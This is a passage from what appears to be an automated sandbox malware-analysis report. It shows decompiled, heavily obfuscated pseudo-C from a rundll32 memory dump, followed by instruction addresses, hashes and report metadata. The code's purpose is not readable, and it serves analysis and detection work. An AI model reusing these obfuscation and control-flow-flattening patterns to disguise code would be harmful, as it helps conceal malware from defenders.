				_v2904 = _v2904 / _t835;
				_v2904 = _v2904 << 7;
				_v2904 = _v2904 ^ 0x5c13da49;
				_v2904 = _v2904 ^ 0x5c3fedf9;
				_v2632 = 0x15dffa;
				_v2632 = _v2632 | 0xc7418eca;
				_v2632 = _v2632 ^ 0xc75c6c30;
				_v2692 = 0x7a9c1f;
				_v2692 = _v2692 >> 9;
				_v2692 = _v2692 ^ 0x00075ef2;
				_v2840 = 0xf91be9;
				_v2840 = _v2840 << 0xb;
				_v2840 = _v2840 >> 0xc;
				_v2840 = _v2840 ^ 0x00055b58;
				_v2684 = 0x12d980;
				_v2684 = _v2684 ^ 0x93e0c374;
				_v2684 = _v2684 ^ 0x93f47314;
				_v2832 = 0x3fcd4e;
				_t836 = 0x39;
				_v2832 = _v2832 * 0x23;
				_v2832 = _v2832 ^ 0x731c45b4;
				_v2832 = _v2832 ^ 0x7ba35a76;
				_v2932 = 0xb82be4;
				_v2932 = _v2932 >> 2;
				_v2932 = _v2932 + 0xffffbbf6;
				_v2932 = _v2932 ^ 0xe6b723f0;
				_v2932 = _v2932 ^ 0xe690d0e6;
				_v2940 = 0xf6526b;
				_v2940 = _v2940 | 0x896b4159;
				_v2940 = _v2940 >> 3;
				_v2940 = _v2940 | 0x09d41357;
				_v2940 = _v2940 ^ 0x19f157b8;
				_v2676 = 0xe71313;
				_v2676 = _v2676 << 0xd;
				_v2676 = _v2676 ^ 0xe2630a9f;
				_v2640 = 0xe3d77b;
				_v2640 = _v2640 * 0x19;
				_v2640 = _v2640 ^ 0x1648a918;
				_v2816 = 0xdf828c;
				_v2816 = _v2816 | 0xf06a9773;
				_v2816 = _v2816 + 0x1ac7;
				_v2816 = _v2816 ^ 0xf0f0cf03;
				_v2644 = 0x24d1c;
				_v2644 = _v2644 >> 0xd;
				_v2644 = _v2644 ^ 0x000db5f9;
				_v2668 = 0x9507be;
				_v2668 = _v2668 + 0xd758;
				_v2668 = _v2668 ^ 0x009d301b;
				_v2824 = 0xe674f2;
				_v2824 = _v2824 + 0xffffc4e0;
				_v2824 = _v2824 ^ 0xd4611b5a;
				_v2824 = _v2824 ^ 0xd482eada;
				_v2648 = 0x3f77b6;
				_v2648 = _v2648 * 0x1f;
				_v2648 = _v2648 ^ 0x07a98b69;
				_v2916 = 0xdc78a8;
				_v2916 = _v2916 << 5;
				_v2916 = _v2916 / _t836;
				_t837 = 0x7a;
				_v2916 = _v2916 * 0x39;
				_v2916 = _v2916 ^ 0x1b8ad1f1;
				_v2728 = 0xa8155b;
				_v2728 = _v2728 >> 0xd;
				_v2728 = _v2728 ^ 0x000db557;
				_v2924 = 0xc6e5a0;
				_v2924 = _v2924 * 0x2c;
				_v2924 = _v2924 << 5;
				_v2924 = _v2924 | 0x115a405f;
				_v2924 = _v2924 ^ 0x55fa9076;
				_v2856 = 0x96149c;
				_v2856 = _v2856 / _t837;
				_v2856 = _v2856 + 0xf5fc;
				_v2856 = _v2856 ^ 0x000b25f1;
				_v2908 = 0xf2f954;
				_v2908 = _v2908 << 6;
				_v2908 = _v2908 + 0xac42;
				_v2908 = _v2908 ^ 0xa8828693;
				_v2908 = _v2908 ^ 0x943e6ee2;
				_v2732 = 0x9d6f74;
				_t838 = 0x46;
				_v2732 = _v2732 / _t838;
				_v2732 = _v2732 ^ 0x000ebec1;
				_v2820 = 0x59e1c1;
				_v2820 = _v2820 * 0x4d;
				_v2820 = _v2820 / _t838;
				_v2820 = _v2820 ^ 0x00608b59;
				_v2716 = 0x351287;
				_v2716 = _v2716 >> 1;
				_v2716 = _v2716 ^ 0x0018d4d2;
				_v2812 = 0xcb2c1b;
				_t839 = 0x2b;
				_v2812 = _v2812 / _t839;
				_v2812 = _v2812 + 0xffff7101;
				_v2812 = _v2812 ^ 0x0007f207;
				_v2660 = 0xceb36b;
				_t840 = 0x67;
				_v2660 = _v2660 / _t840;
				_v2660 = _v2660 ^ 0x000d619e;
				_v2744 = 0xbb097e;
				_v2744 = _v2744 | 0xecb8e5a6;
				_v2744 = _v2744 << 7;
				_v2744 = _v2744 ^ 0x5df8a0e4;
				_v2912 = 0xf8d451;
				_v2912 = _v2912 >> 4;
				_v2912 = _v2912 | 0xaea8ed4c;
				_v2912 = _v2912 + 0xffff0521;
				_v2912 = _v2912 ^ 0xaea7c2f3;
				_v2752 = 0x565eb7;
				_v2752 = _v2752 * 0x70;
				_v2752 = _v2752 * 0x24;
				_v2752 = _v2752 ^ 0x505f8268;
				_v2652 = 0xc20920;
				_v2652 = _v2652 * 0x66;
				_v2652 = _v2652 ^ 0x4d45043e;
				_v2804 = 0x19938d;
				_v2804 = _v2804 << 0xb;
				_v2804 = _v2804 >> 6;
				_v2804 = _v2804 ^ 0x0331c866;
				_v2708 = 0x9f0ca5;
				_v2708 = _v2708 + 0x5236;
				_v2708 = _v2708 ^ 0x009f1cbf;
				_v2636 = 0x17d7da;
				_v2636 = _v2636 + 0xffff61a3;
				_v2636 = _v2636 ^ 0x001c6ee3;
				_v2772 = 0x640c2e;
				_v2772 = _v2772 | 0xfe977bed;
				_v2772 = _v2772 ^ 0xfef1aca3;
				_v2712 = 0x57713;
				_v2712 = _v2712 | 0x1719e5a8;
				_v2712 = _v2712 ^ 0x171223b6;
				_v2800 = 0xacde46;
				_v2800 = _v2800 << 3;
				_v2800 = _v2800 >> 0xb;
				_v2800 = _v2800 ^ 0x00094896;
				_v2900 = 0xf23167;
				_v2900 = _v2900 << 8;
				_t841 = 0x63;
				_v2900 = _v2900 / _t841;
				_v2900 = _v2900 + 0xcf21;
				_v2900 = _v2900 ^ 0x02793070;
				_v2720 = 0x2ffea5;
				_v2720 = _v2720 >> 0xa;
				_v2720 = _v2720 ^ 0x000a3377;
				_v2760 = 0x7162f3;
				_v2760 = _v2760 + 0x3cd5;
				_t842 = 0x38;
				_v2760 = _v2760 / _t842;
				_v2760 = _v2760 ^ 0x0007aff4;
                                                                                                                      				_v2928 = 0x75cba7;
                                                                                                                      				_v2928 = _v2928 >> 6;
                                                                                                                      				_t843 = 0x74;
                                                                                                                      				_v2928 = _v2928 / _t843;
                                                                                                                      				_t844 = 0x21;
                                                                                                                      				_v2928 = _v2928 * 0x5b;
                                                                                                                      				_v2928 = _v2928 ^ 0x00010bb2;
                                                                                                                      				_v2896 = 0xbdd326;
                                                                                                                      				_v2896 = _v2896 | 0x8e80784e;
                                                                                                                      				_v2896 = _v2896 + 0xffff4642;
                                                                                                                      				_v2896 = _v2896 + 0xfffff2a7;
                                                                                                                      				_v2896 = _v2896 ^ 0x8eb0d4b0;
                                                                                                                      				_v2724 = 0x540c5f;
                                                                                                                      				_v2724 = _v2724 | 0x0f00b7a6;
                                                                                                                      				_v2724 = _v2724 ^ 0x0f539187;
                                                                                                                      				_v2672 = 0x9e9c9c;
                                                                                                                      				_v2672 = _v2672 | 0xc48b5739;
                                                                                                                      				_v2672 = _v2672 ^ 0xc4908703;
                                                                                                                      				_v2776 = 0xa23bdf;
                                                                                                                      				_v2776 = _v2776 * 0x51;
                                                                                                                      				_v2776 = _v2776 + 0xe0c7;
                                                                                                                      				_v2776 = _v2776 ^ 0x335416a6;
                                                                                                                      				_v2680 = 0x681f8;
                                                                                                                      				_v2680 = _v2680 + 0xffff4f6a;
                                                                                                                      				_v2680 = _v2680 ^ 0x00015d99;
                                                                                                                      				_v2784 = 0xd006bd;
                                                                                                                      				_v2784 = _v2784 / _t844;
                                                                                                                      				_v2784 = _v2784 + 0xffffb229;
                                                                                                                      				_v2784 = _v2784 ^ 0x00021ec3;
                                                                                                                      				_v2884 = 0x9df7f6;
                                                                                                                      				_v2884 = _v2884 << 3;
                                                                                                                      				_v2884 = _v2884 >> 0xa;
                                                                                                                      				_v2884 = _v2884 ^ 0x9c3d07c3;
                                                                                                                      				_v2884 = _v2884 ^ 0x9c378ea0;
                                                                                                                      				_v2664 = 0x8a5c5e;
                                                                                                                      				_v2664 = _v2664 + 0xb05;
                                                                                                                      				_v2664 = _v2664 ^ 0x008bdf18;
                                                                                                                      				_v2892 = 0xf8cc9d;
                                                                                                                      				_v2892 = _v2892 * 0x75;
                                                                                                                      				_v2892 = _v2892 * 0x2f;
                                                                                                                      				_v2892 = _v2892 + 0x5b88;
                                                                                                                      				_v2892 = _v2892 ^ 0xe0504abc;
                                                                                                                      				_v2768 = 0xf7b3ac;
                                                                                                                      				_v2768 = _v2768 * 0x12;
                                                                                                                      				_v2768 = _v2768 * 0x37;
                                                                                                                      				_v2768 = _v2768 ^ 0xbde7c305;
                                                                                                                      				_v2736 = 0x24d80;
                                                                                                                      				_v2736 = _v2736 + 0xc084;
                                                                                                                      				_v2736 = _v2736 ^ 0x0003dff9;
                                                                                                                      				_v2756 = 0xcbd51;
                                                                                                                      				_v2756 = _v2756 ^ 0x3e0e537e;
                                                                                                                      				_t845 = 0x33;
                                                                                                                      				_v2756 = _v2756 / _t845;
                                                                                                                      				_v2756 = _v2756 ^ 0x01338860;
                                                                                                                      				_v2876 = 0x572b9a;
                                                                                                                      				_v2876 = _v2876 | 0xf33633ff;
                                                                                                                      				_v2876 = _v2876 + 0xffffc963;
                                                                                                                      				_t846 = 9;
                                                                                                                      				_v2876 = _v2876 * 0x5a;
                                                                                                                      				_v2876 = _v2876 ^ 0x97d6d328;
                                                                                                                      				_v2780 = 0x1c7f97;
                                                                                                                      				_v2780 = _v2780 | 0xd857d991;
                                                                                                                      				_v2780 = _v2780 ^ 0x2bc247dc;
                                                                                                                      				_v2780 = _v2780 ^ 0xf39978d6;
                                                                                                                      				_v2828 = 0x976a05;
                                                                                                                      				_v2828 = _v2828 << 2;
                                                                                                                      				_v2828 = _v2828 + 0x20c3;
                                                                                                                      				_v2828 = _v2828 ^ 0x0259597b;
                                                                                                                      				_v2764 = 0x91cc1a;
                                                                                                                      				_v2764 = _v2764 ^ 0x7e34b684;
                                                                                                                      				_v2764 = _v2764 / _t846;
                                                                                                                      				_v2764 = _v2764 ^ 0x0e161a93;
                                                                                                                      				_v2836 = 0xb2bb8f;
                                                                                                                      				_v2836 = _v2836 ^ 0xe08a2441;
                                                                                                                      				_v2836 = _v2836 << 9;
                                                                                                                      				_v2836 = _v2836 ^ 0x713d110f;
                                                                                                                      				_v2656 = 0xe40eab;
                                                                                                                      				_t847 = 0x44;
                                                                                                                      				_v2656 = _v2656 / _t847;
                                                                                                                      				_v2656 = _v2656 ^ 0x00028457;
                                                                                                                      				_v2848 = 0xe3c04;
                                                                                                                      				_t848 = 0x16;
                                                                                                                      				_v2848 = _v2848 * 0x5d;
                                                                                                                      				_v2848 = _v2848 + 0xc20e;
                                                                                                                      				_v2848 = _v2848 ^ 0x0525732a;
                                                                                                                      				_v2872 = 0x975bd1;
                                                                                                                      				_v2872 = _v2872 / _t848;
                                                                                                                      				_v2872 = _v2872 >> 1;
                                                                                                                      				_t849 = 0x62;
                                                                                                                      				_v2872 = _v2872 / _t849;
                                                                                                                      				_v2872 = _v2872 ^ 0x00094208;
                                                                                                                      				_v2852 = 0xde6f00;
                                                                                                                      				_v2852 = _v2852 + 0xdf6f;
                                                                                                                      				_t850 = 0x4c;
                                                                                                                      				_v2852 = _v2852 / _t850;
                                                                                                                      				_v2852 = _v2852 ^ 0x0009f2db;
                                                                                                                      				_v2796 = 0x43f736;
                                                                                                                      				_t851 = 0x53;
                                                                                                                      				_v2796 = _v2796 / _t851;
                                                                                                                      				_v2796 = _v2796 + 0x7bc9;
                                                                                                                      				_v2796 = _v2796 ^ 0x00042e34;
                                                                                                                      				_v2688 = 0xf8ab78;
                                                                                                                      				_t852 = 0x3c;
                                                                                                                      				_v2688 = _v2688 * 0x22;
                                                                                                                      				_v2688 = _v2688 ^ 0x21025542;
                                                                                                                      				_v2696 = 0x9e8755;
                                                                                                                      				_v2696 = _v2696 + 0xe3ef;
                                                                                                                      				_v2696 = _v2696 ^ 0x00960058;
                                                                                                                      				_v2792 = 0x415dac;
                                                                                                                      				_v2792 = _v2792 >> 1;
                                                                                                                      				_v2792 = _v2792 + 0xffffd338;
                                                                                                                      				_v2792 = _v2792 ^ 0x002ca457;
                                                                                                                      				_v2704 = 0xb8f6ce;
                                                                                                                      				_v2704 = _v2704 + 0xffff4ac5;
                                                                                                                      				_v2704 = _v2704 ^ 0x00b9d8ec;
                                                                                                                      				_v2860 = 0x12dd79;
                                                                                                                      				_v2860 = _v2860 ^ 0x144e403a;
                                                                                                                      				_v2860 = _v2860 / _t852;
                                                                                                                      				_v2860 = _v2860 ^ 0x93d5fcb7;
                                                                                                                      				_v2860 = _v2860 ^ 0x93828b4c;
                                                                                                                      				_v2868 = 0x481259;
                                                                                                                      				_v2868 = _v2868 ^ 0xea83c1db;
                                                                                                                      				_v2868 = _v2868 + 0xffff22f6;
                                                                                                                      				_v2868 = _v2868 | 0xf9bd7925;
                                                                                                                      				_v2868 = _v2868 ^ 0xfbfe4ce9;
                                                                                                                      				_v2740 = 0xefe715;
                                                                                                                      				_v2740 = _v2740 << 7;
                                                                                                                      				_v2740 = _v2740 >> 5;
                                                                                                                      				_v2740 = _v2740 ^ 0x03bc65a1;
                                                                                                                      				_v2748 = 0x39cd9f;
                                                                                                                      				_v2748 = _v2748 * 0x16;
                                                                                                                      				_v2748 = _v2748 + 0xefc3;
                                                                                                                      				_v2748 = _v2748 ^ 0x04f9debc;
                                                                                                                      				_t797 = E00188FD2(_t852);
                                                                                                                      				_t930 = _v2736;
                                                                                                                      				_t830 = _t797;
                                                                                                                      				while(1) {
                                                                                                                      					L1:
                                                                                                                      					_t798 = 0x7e670bc;
                                                                                                                      					do {
                                                                                                                      						while(1) {
                                                                                                                      							L2:
                                                                                                                      							_t945 = _t931 - 0x7d4716d;
                                                                                                                      							if(_t945 > 0) {
                                                                                                                      								break;
                                                                                                                      							}
                                                                                                                      							if(_t945 == 0) {
                                                                                                                      								_t858 = _v2848;
                                                                                                                      								E001768DE(_t858, _v2872, _v2852, _v2796, _t930);
                                                                                                                      								_t937 =  &(_t937[3]);
                                                                                                                      								_t931 = 0x97d4d6b;
                                                                                                                      								while(1) {
                                                                                                                      									L1:
                                                                                                                      									_t798 = 0x7e670bc;
                                                                                                                      									goto L2;
                                                                                                                      								}
                                                                                                                      							} else {
                                                                                                                      								if(_t931 == 0x9f9f0c) {
                                                                                                                      									_v2612 = E001913A6();
                                                                                                                      									_v2608 = 2 + E0018BA68(_v2716, _v2812, _v2660, _t808, _v2744) * 2;
                                                                                                                      									_t858 = _t830;
                                                                                                                      									_t812 = E00175EB5(_t858, _v2912, _t830, _v2752,  &_v2616, _v2700, _v2652, _v2804, _v2708, _t830, _v2716, _v2716, _v2636, _v2772);
                                                                                                                      									_t937 =  &(_t937[0xf]);
                                                                                                                      									__eflags = _t812;
                                                                                                                      									if(__eflags != 0) {
                                                                                                                      										_t931 = 0xaab8dea;
                                                                                                                      										while(1) {
                                                                                                                      											L1:
                                                                                                                      											_t798 = 0x7e670bc;
                                                                                                                      											goto L2;
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								} else {
                                                                                                                      									if(_t931 == 0x1e136d2) {
                                                                                                                      										_push(_v2656);
                                                                                                                      										_push(_v2836);
                                                                                                                      										_push(_v2764);
                                                                                                                      										_push(0);
                                                                                                                      										_push(0);
                                                                                                                      										_push(_v2828);
                                                                                                                      										_push(_t858);
                                                                                                                      										_push(1);
                                                                                                                      										_t858 =  &_v1044;
                                                                                                                      										E00179700(_t858, _v2780, __eflags);
                                                                                                                      										_t937 =  &(_t937[8]);
                                                                                                                      										_t931 = 0x7d4716d;
                                                                                                                      										while(1) {
                                                                                                                      											L1:
                                                                                                                      											_t798 = 0x7e670bc;
                                                                                                                      											goto L2;
                                                                                                                      										}
                                                                                                                      									} else {
                                                                                                                      										if(_t931 == 0x2dbd64b) {
                                                                                                                      											return E00184DAD(_v2860, _v2868, _v2616, _v2740, _v2748);
                                                                                                                      										}
                                                                                                                      										if(_t931 == 0x63d9dbc) {
                                                                                                                      											_push(_t858);
                                                                                                                      											E0017EA7B( &_v524, _v2788, _v2888, _t858, _v2844, _v2920, _v2864);
                                                                                                                      											_t937 =  &(_t937[7]);
                                                                                                                      											_t931 = 0xc6ce6ce;
                                                                                                                      											while(1) {
                                                                                                                      												L1:
                                                                                                                      												_t798 = 0x7e670bc;
                                                                                                                      												goto L2;
                                                                                                                      											}
                                                                                                                      										} else {
                                                                                                                      											if(_t931 != 0x7253c5e) {
                                                                                                                      												goto L24;
                                                                                                                      											} else {
                                                                                                                      												_t858 = _v2760;
                                                                                                                      												_t930 = E0018C9A9(_v2928, _v2896, _v2624, _v2724, _v2620);
                                                                                                                      												_t937 =  &(_t937[4]);
                                                                                                                      												_t798 = 0x7e670bc;
                                                                                                                      												_t931 =  !=  ? 0x7e670bc : 0x97d4d6b;
                                                                                                                      												continue;
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      									L28:
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      							L27:
                                                                                                                      							return _t812;
                                                                                                                      							goto L28;
                                                                                                                      						}
                                                                                                                      						__eflags = _t931 - _t798;
                                                                                                                      						if(__eflags == 0) {
                                                                                                                      							_push(_v2784);
                                                                                                                      							_push(_v2680);
                                                                                                                      							_push(0x17190c);
                                                                                                                      							E0018D37B(E0017AB66(_v2672, _v2776, __eflags), __eflags, _v2664, _t930, _v2672, _v2892,  &_v524,  &_v1044,  &_v2604, _v2768);
                                                                                                                      							E0017AE03(_v2736, _v2756, _v2876, _t799);
                                                                                                                      							_t937 =  &(_t937[0xd]);
                                                                                                                      							_t931 = 0x1e136d2;
                                                                                                                      							_t798 = 0x7e670bc;
                                                                                                                      							goto L24;
                                                                                                                      						} else {
                                                                                                                      							__eflags = _t931 - 0x97d4d6b;
                                                                                                                      							if(_t931 == 0x97d4d6b) {
                                                                                                                      								E001768DE(_v2688, _v2696, _v2792, _v2704, _v2624);
                                                                                                                      								_t937 =  &(_t937[3]);
                                                                                                                      								_t931 = 0x2dbd64b;
                                                                                                                      								goto L1;
                                                                                                                      							} else {
                                                                                                                      								__eflags = _t931 - 0xaab8dea;
                                                                                                                      								if(_t931 == 0xaab8dea) {
                                                                                                                      									E0017777B(_v2712,  &_v2624,  &_v2616, _v2800, _v2900, _v2720);
                                                                                                                      									_t937 =  &(_t937[4]);
                                                                                                                      									asm("sbb esi, esi");
                                                                                                                      									_t931 = (_t931 & 0x04496613) + 0x2dbd64b;
                                                                                                                      									while(1) {
                                                                                                                      										L1:
                                                                                                                      										_t798 = 0x7e670bc;
                                                                                                                      										goto L2;
                                                                                                                      									}
                                                                                                                      								} else {
                                                                                                                      									__eflags = _t931 - 0xc6ce6ce;
                                                                                                                      									if(__eflags != 0) {
                                                                                                                      										goto L24;
                                                                                                                      									} else {
                                                                                                                      										E001912A8(_t858, _v2628, __eflags, _v2880, _v2904,  &_v2084);
                                                                                                                      										 *((short*)(E00184FA8(_v2632,  &_v2084, _v2692, _v2840))) = 0;
                                                                                                                      										E00178650(_v2684,  &_v1564, __eflags, _v2832);
                                                                                                                      										_push(_v2640);
                                                                                                                      										_push(_v2676);
                                                                                                                      										_push(0x17181c);
                                                                                                                      										E0017E7CE(E0017AB66(_v2932, _v2940, __eflags), __eflags, _v2816,  &_v2084, _v2932, _v2644, _v2668, _v2824, _v2648,  &_v1564);
                                                                                                                      										E0017AE03(_v2916, _v2728, _v2924, _t825);
                                                                                                                      										_t858 = _v2856;
                                                                                                                      										_t812 = E0018C38F(_t858,  &_v2604, _t936, _v2908);
                                                                                                                      										_t937 =  &(_t937[0x15]);
                                                                                                                      										__eflags = _t812;
                                                                                                                      										if(__eflags != 0) {
                                                                                                                      											_t931 = 0x9f9f0c;
                                                                                                                      											while(1) {
                                                                                                                      												L1:
                                                                                                                      												_t798 = 0x7e670bc;
                                                                                                                      												goto L2;
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						goto L27;
                                                                                                                      						L24:
                                                                                                                      						__eflags = _t931 - 0xd142a7e;
                                                                                                                      					} while (__eflags != 0);
                                                                                                                      					return _t798;
                                                                                                                      				}
                                                                                                                      			}



























































































































                                                                                                                      0x00174d2c
                                                                                                                      0x00174d34
                                                                                                                      0x00174d3c
                                                                                                                      0x00174d47
                                                                                                                      0x00174d52
                                                                                                                      0x00174d5d
                                                                                                                      0x00174d68
                                                                                                                      0x00174d73
                                                                                                                      0x00174d7e
                                                                                                                      0x00174d89
                                                                                                                      0x00174d94
                                                                                                                      0x00174d9f
                                                                                                                      0x00174daa
                                                                                                                      0x00174db5
                                                                                                                      0x00174dc0
                                                                                                                      0x00174dcb
                                                                                                                      0x00174dd6
                                                                                                                      0x00174dde
                                                                                                                      0x00174de6
                                                                                                                      0x00174df1
                                                                                                                      0x00174df9
                                                                                                                      0x00174e06
                                                                                                                      0x00174e0b
                                                                                                                      0x00174e11
                                                                                                                      0x00174e19
                                                                                                                      0x00174e21
                                                                                                                      0x00174e2c
                                                                                                                      0x00174e34
                                                                                                                      0x00174e3f
                                                                                                                      0x00174e4a
                                                                                                                      0x00174e5c
                                                                                                                      0x00174e61
                                                                                                                      0x00174e6a
                                                                                                                      0x00174e75
                                                                                                                      0x00174e7d
                                                                                                                      0x00174e86
                                                                                                                      0x00174e8b
                                                                                                                      0x00174e96
                                                                                                                      0x00174e97
                                                                                                                      0x00174e9b
                                                                                                                      0x00174ea3
                                                                                                                      0x00174eab
                                                                                                                      0x00174eb3
                                                                                                                      0x00174ebb
                                                                                                                      0x00174ec3
                                                                                                                      0x00174ecb
                                                                                                                      0x00174ed6
                                                                                                                      0x00174ee1
                                                                                                                      0x00174eec
                                                                                                                      0x00174ef7
                                                                                                                      0x00174f02
                                                                                                                      0x00174f0d
                                                                                                                      0x00174f20
                                                                                                                      0x00174f27
                                                                                                                      0x00174f32
                                                                                                                      0x00174f3d
                                                                                                                      0x00174f48
                                                                                                                      0x00174f53
                                                                                                                      0x00174f5e
                                                                                                                      0x00174f72
                                                                                                                      0x00174f79
                                                                                                                      0x00174f84
                                                                                                                      0x00174f8f
                                                                                                                      0x00174f97
                                                                                                                      0x00174f9c
                                                                                                                      0x00174fa1
                                                                                                                      0x00174fa9
                                                                                                                      0x00174fb1
                                                                                                                      0x00174fbc
                                                                                                                      0x00174fc7
                                                                                                                      0x00174fd2
                                                                                                                      0x00174fdf
                                                                                                                      0x00174fe8
                                                                                                                      0x00174fec
                                                                                                                      0x00174ff4
                                                                                                                      0x00174ffc
                                                                                                                      0x0017500f
                                                                                                                      0x0017501e
                                                                                                                      0x00175025
                                                                                                                      0x00175030
                                                                                                                      0x0017503b
                                                                                                                      0x00175046
                                                                                                                      0x00175051
                                                                                                                      0x0017505e
                                                                                                                      0x00175072
                                                                                                                      0x00175077
                                                                                                                      0x00175080
                                                                                                                      0x0017508b
                                                                                                                      0x00175093
                                                                                                                      0x0017509b
                                                                                                                      0x001750a8
                                                                                                                      0x001750ab
                                                                                                                      0x001750af
                                                                                                                      0x001750b7
                                                                                                                      0x001750c2
                                                                                                                      0x001750cd
                                                                                                                      0x001750d8
                                                                                                                      0x001750e3
                                                                                                                      0x001750ee
                                                                                                                      0x001750f6
                                                                                                                      0x00175101
                                                                                                                      0x0017510c
                                                                                                                      0x00175117
                                                                                                                      0x0017512d
                                                                                                                      0x00175134
                                                                                                                      0x0017513f
                                                                                                                      0x00175147
                                                                                                                      0x0017514f
                                                                                                                      0x00175154
                                                                                                                      0x0017515c
                                                                                                                      0x0017516e
                                                                                                                      0x00175173
                                                                                                                      0x0017517c
                                                                                                                      0x00175187
                                                                                                                      0x00175194
                                                                                                                      0x00175197
                                                                                                                      0x0017519b
                                                                                                                      0x001751a3
                                                                                                                      0x001751ab
                                                                                                                      0x001751bb
                                                                                                                      0x001751bf
                                                                                                                      0x001751c7
                                                                                                                      0x001751cc
                                                                                                                      0x001751d2
                                                                                                                      0x001751da
                                                                                                                      0x001751e2
                                                                                                                      0x001751ee
                                                                                                                      0x001751f3
                                                                                                                      0x001751f9
                                                                                                                      0x00175201
                                                                                                                      0x00175213
                                                                                                                      0x00175216
                                                                                                                      0x0017521d
                                                                                                                      0x00175228
                                                                                                                      0x00175235
                                                                                                                      0x0017524a
                                                                                                                      0x0017524b
                                                                                                                      0x00175252
                                                                                                                      0x0017525d
                                                                                                                      0x00175268
                                                                                                                      0x00175273
                                                                                                                      0x0017527e
                                                                                                                      0x00175289
                                                                                                                      0x00175290
                                                                                                                      0x0017529b
                                                                                                                      0x001752a6
                                                                                                                      0x001752b1
                                                                                                                      0x001752bc
                                                                                                                      0x001752c7
                                                                                                                      0x001752cf
                                                                                                                      0x001752dd
                                                                                                                      0x001752e1
                                                                                                                      0x001752e9
                                                                                                                      0x001752f1
                                                                                                                      0x001752f9
                                                                                                                      0x00175301
                                                                                                                      0x00175309
                                                                                                                      0x00175311
                                                                                                                      0x00175319
                                                                                                                      0x00175324
                                                                                                                      0x0017532c
                                                                                                                      0x00175334
                                                                                                                      0x0017533f
                                                                                                                      0x00175352
                                                                                                                      0x00175359
                                                                                                                      0x00175364
                                                                                                                      0x0017537a
                                                                                                                      0x0017537f
                                                                                                                      0x00175386
                                                                                                                      0x00175388
                                                                                                                      0x00175388
                                                                                                                      0x00175388
                                                                                                                      0x0017538d
                                                                                                                      0x0017538d
                                                                                                                      0x0017538d
                                                                                                                      0x0017538d
                                                                                                                      0x00175393
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00175399
                                                                                                                      0x00175545
                                                                                                                      0x00175549
                                                                                                                      0x0017554e
                                                                                                                      0x00175551
                                                                                                                      0x00175388
                                                                                                                      0x00175388
                                                                                                                      0x00175388
                                                                                                                      0x00000000
                                                                                                                      0x00175388
                                                                                                                      0x0017539f
                                                                                                                      0x001753a5
                                                                                                                      0x001754a5
                                                                                                                      0x001754d8
                                                                                                                      0x001754f7
                                                                                                                      0x0017551b
                                                                                                                      0x00175520
                                                                                                                      0x00175523
                                                                                                                      0x00175525
                                                                                                                      0x0017552b
                                                                                                                      0x00175388
                                                                                                                      0x00175388
                                                                                                                      0x00175388
                                                                                                                      0x00000000
                                                                                                                      0x00175388
                                                                                                                      0x00175388
                                                                                                                      0x001753ab
                                                                                                                      0x001753b1
                                                                                                                      0x0017544b
                                                                                                                      0x00175452
                                                                                                                      0x00175456
                                                                                                                      0x0017545d
                                                                                                                      0x0017545f
                                                                                                                      0x00175461
                                                                                                                      0x0017546f
                                                                                                                      0x00175470
                                                                                                                      0x00175472
                                                                                                                      0x00175479

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: &Xbm$'X$04$6R$KO!$X$kM}$kM}$kM}$w3
                                                                                                                      • API String ID: 0-3270913840
                                                                                                                      • Opcode ID: df357da4fb879c7f681d95c13f0ecf6836b4ba603554fe90e29551ee8e406324
                                                                                                                      • Instruction ID: 57486c11f4f174e368df6cca8bbb95a4357268cbec455d3a961ae6c2d41840b8
                                                                                                                      • Opcode Fuzzy Hash: df357da4fb879c7f681d95c13f0ecf6836b4ba603554fe90e29551ee8e406324
                                                                                                                      • Instruction Fuzzy Hash: DD82FE71508380DBD378CF61C98AB9BBBE2BBD4308F10891DE5DA96260D7B59948CF53
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 94%
                                                                                                                      			E00181831(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a20, intOrPtr _a24) {
                                                                                                                      				char _v8;
                                                                                                                      				char _v12;
                                                                                                                      				intOrPtr _v16;
                                                                                                                      				char _v20;
                                                                                                                      				char _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				signed int _v108;
                                                                                                                      				signed int _v112;
                                                                                                                      				signed int _v116;
                                                                                                                      				signed int _v120;
                                                                                                                      				signed int _v124;
                                                                                                                      				signed int _v128;
                                                                                                                      				signed int _v132;
                                                                                                                      				signed int _v136;
                                                                                                                      				signed int _v140;
                                                                                                                      				signed int _v144;
                                                                                                                      				signed int _v148;
                                                                                                                      				signed int _v152;
                                                                                                                      				signed int _v156;
                                                                                                                      				signed int _v160;
                                                                                                                      				signed int _v164;
                                                                                                                      				signed int _v168;
                                                                                                                      				signed int _v172;
                                                                                                                      				signed int _v176;
                                                                                                                      				signed int _v180;
                                                                                                                      				signed int _v184;
                                                                                                                      				signed int _v188;
                                                                                                                      				signed int _v192;
                                                                                                                      				signed int _v196;
                                                                                                                      				signed int _v200;
